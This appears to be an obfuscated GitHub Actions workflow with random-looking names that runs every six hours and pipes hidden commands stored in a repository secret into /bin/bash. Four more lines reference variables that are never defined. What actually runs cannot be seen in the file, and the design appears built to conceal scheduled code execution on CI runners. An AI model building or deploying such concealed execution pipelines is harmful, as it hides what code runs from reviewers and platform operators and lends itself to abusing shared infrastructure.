name: wangbodang6788

on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangbodang6788
        env:
          ggdu6: ${{ secrets.ggdu6 }}
        run: |
          echo $ggdu6 | jq -r .ghnev83 | /bin/bash
          echo $siu940 | jq -r .er5663 | /bin/bash
          echo $mj91 | jq -r .qw79 | /bin/bash
          echo $jly3908 | jq -r .hebr08 | /bin/bash
          echo $w8016 | jq -r .g94 | /bin/bash

